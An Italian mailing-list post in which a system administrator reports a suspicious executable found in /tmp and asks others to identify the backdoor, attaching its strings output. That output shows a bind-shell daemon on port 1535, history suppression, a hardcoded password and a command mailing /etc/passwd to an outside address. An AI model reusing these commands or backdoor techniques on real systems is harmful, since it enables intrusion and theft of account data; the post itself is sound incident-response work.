[Hackmeeting] backdoor

Delete this message

Reply to this message
Autor: Marco Bertorello
Data:  
A: hackmeeting
Assumpte: [Hackmeeting] backdoor
Ciao a tutti,

ho trovato un file estremamente sospetto (/tmp/ownz), associato all'
utente nobody.

E' un file binario eseguibile e con strings s'è rivelato essere una
backdoor, però non trovo informazioni su che tipo di backdoor sia e che
cosa faccia (a parte spedire ad un indirizzo email il passwd[1]).

Qualcuno ne sa qualcosa? in allegato trovate l'output di strings

Grazie, ciao

[1] Nota a parte, con il solo passwd, ma senza lo shadow... cosa se ne
può fare?!?

-- 
Marco Bertorello         System Administrator
Linux Registered User #319921    marco@???


"Conoscere Bill Gates era il secondo dei miei sogni, il primo è quello di
visitare Disneyland" - Arfa Karim

/lib/ld-linux.so.2
SuSE
_Jv_RegisterClasses
__gmon_start__
libc.so.6
strcpy
waitpid
ioctl
printf
recv
execve
perror
dup2
system
socket
select
bzero
setpgid
send
alarm
accept
write
kill
bind
chdir
setsockopt
memchr
signal
read
listen
fork
memset
ntohs
strcmp
htons
atoi
_IO_stdin_used
_exit
__libc_start_main
strlen
open
setsid
close
getsockname
GLIBC_2.0
PTRh
TERM=xterm
SHELL=/bin/bash
PS1=\[\033[1;30m\][\[\033[0;32m\]\u\[\033[1;32m\]@\[\033[0;32m\]\h \[\033[1;37m\]\W\[\033[1;30m\]]\[\033[0m\]#
HISTFILE=/dev/null
HOME=/var/tmp
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:./bin:/var/tmp:/var/tmp/bin
pqrstuvwxyzabcde
0123456789abcdef
/dev/ptmx
/dev/pty
/dev/tty
/dev/null
Can't open a tty, all in use ?
Can't fork subshell, there is no way...
/var/tmp
/bin/sh
Can't execve shell!
USAGE: %s [PORT=1535]
:: Starting backdoor daemon ::
cat /etc/passwd|mail -s '0wnz4ever 1535' elzorg@???
socket
setsockopt
bind
listen
getsockname
Listening to port %d
FUCK: Can't fork child (%d)
:: Done, pid=%d ::
klogd
P554 SMTP
0wnz4ever
500 Error: bad syntax
.:: #rohack GROUP ::.
.:: Do not distrubute ::.
.:: by Zorg & seby_` ::.